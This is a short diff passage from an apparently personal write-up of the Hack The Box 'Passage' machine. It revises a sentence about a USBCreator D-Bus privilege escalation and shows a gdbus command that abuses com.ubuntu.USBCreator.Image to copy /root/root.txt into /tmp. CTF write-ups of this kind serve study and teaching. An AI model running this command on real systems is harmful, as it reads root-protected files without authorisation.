davi-cruz/davi-cruz.github.io/_i18n/en-US/_posts/2021-03-06-htb-passage.md

   Vulnerable!!
   ```

-  Besides having this vulnerability in place, when tried to exploit it like explained in [this link](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/) it didn't worked due to the required permissions and may work later with another account.
+  Besides having this vulnerability in place, when tried to exploit it like explained in [this link](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/) it didn't worked due to lack of permissions, which will probably work with another user.

   ```bash
   www-data@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /tmp/somefilename true